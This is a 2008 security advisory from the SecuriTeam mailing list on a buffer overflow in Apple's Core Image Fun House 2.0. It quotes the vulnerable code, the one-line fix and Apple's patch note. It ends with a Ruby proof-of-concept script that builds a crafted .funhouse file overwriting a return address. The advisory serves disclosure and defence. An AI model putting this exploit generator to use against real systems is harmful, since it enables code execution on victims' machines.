[NEWS] Apple Core Image Fun House BUffer Overflow
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 13 Jul 2008 09:04:11 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Apple Core Image Fun House BUffer Overflow
------------------------------------------------------------------------
SUMMARY
"From creating new solutions for print, photography, scientific
visualization, and film post-production to enhancing your application's
user interface with innovative and effortless visual effects,
<http://developer.apple.com/macosx/coreimage.html> Apple's Core Image
performs the heavy lifting that enables the next generation of imaging
applications." It is possible to trigger an exploitable buffer overflow
condition in Apple's Core Image by creating a specially crafted .funhouse
file.
DETAILS
Vulnerable Systems:
* Core Image Fun House version 2.0
Immune Systems:
* Core Image Fun House version 3.1 (xcode tools)
The Funhouse application does not properly parse XML data. Specifically it
is possible to create a specially crafted .funhouse file that will trigger
and exploit a buffer overflow condition. The code responsible for the
condition is as follows:
// render origin handles using AppKit directly
- (CIImage *)drawPoints:(CIImage *)im
{
..
~ NSString *str, *str2, *localizedParameter;
..
~ else if ([type isEqualToString:@"image"])
~ {
~ // image effect stack element
~ // show an image origin (in its center)
~ CGRect r = [[es imageAtIndex:i] extent];
~ NSPoint offset = [es offsetAtIndex:i];
~ pt.x = offset.x + (r.origin.x + r.size.width * 0.5);
~ pt.y = offset.y + (r.origin.y + r.size.height * 0.5);
~ str = [[es filenameAtIndex:i] stringByAppendingString:@"
center"];
~ [self drawPoint:pt label:str intoContext:cg];
~ }
}
The following code is called by the code referenced above:
/*
~ Drawing
*/
// draw an onscreen handle for an image origin, text origin, or filter
point
// the handle is a "center symbol" - a circle with crosshairs through it.
// the handle is labelled with the string "str".
// all items are "shadowed"
- (void)drawPoint:(NSPoint)pt label:(NSString *)str
intoContext:(CGContextRef)cg
{
..
~ char cstr[256];
..
~ if (!movingNow)
~ {
~ [str getCString:cstr]; <-- Vulnerability Exists Here
Fix:
To fix the issue the [str getCString:cstr]; needs to be replaced with [str
getCString:cstr maxLength:254]; to prevent overflows.
- [str getCString:cstr];
+ [str getCString:cstr maxLength:254];
Vendor response:
This issue is addressed in Xcode tools 3.1. Credit to Kevin Finisterre of
Netragard for reporting this issue to Apple. Further information is
available at: <http://support.apple.com/kb/HT1222>
http://support.apple.com/kb/HT1222
Proof Of Concept:
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@xxxxxxxxxxxxx
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7: 'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
# CFPropertyListCreateFromXMLData(): plist parse failed;
# the data is notproper UTF-8. The file name for this data
# could be:
$
# /Users/test/Desktop/SuperTastey.funhouse/file.xml
# The parser will retry as in 10.2, but the problem should be
# corrected in the plist.
#
# \x80-\xFF range that do not form proper utf8
len = 300
fname = "SuperTastey"
retaddr = 0x0d0d0d0d # There are lots of filtered chars!
if File.exist?(fname + ".funhouse/file.xml")
File.unlink(fname + ".funhouse/file.xml")
Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse")
FUNSTUFF =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\"
\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\";>" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" +
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" +
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" +
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"
target_file = File.open("SuperTastey.funhouse/file.xml", "w+") { |f|
~ f.print(FUNSTUFF) # weeeeee... lets have fun.
~ f.close
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:advisories@xxxxxxxxxxxxx>
Netragard Security Advisories.
The original article can be found at:
<http://www.netragard.com/pdfs/research/NETRAGARD-20080630-FUNHOUSE.txt>
http://www.netragard.com/pdfs/research/NETRAGARD-20080630-FUNHOUSE.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [UNIX] Novell eDirectory LDAP Search Request Heap Corruption Vulnerability
- Next by Date: [UNIX] Oracle Database Local Untrusted Library Path Vulnerability
- Previous by thread: [UNIX] Novell eDirectory LDAP Search Request Heap Corruption Vulnerability
- Next by thread: [UNIX] Oracle Database Local Untrusted Library Path Vulnerability
- Index(es):
Relevant Pages
|
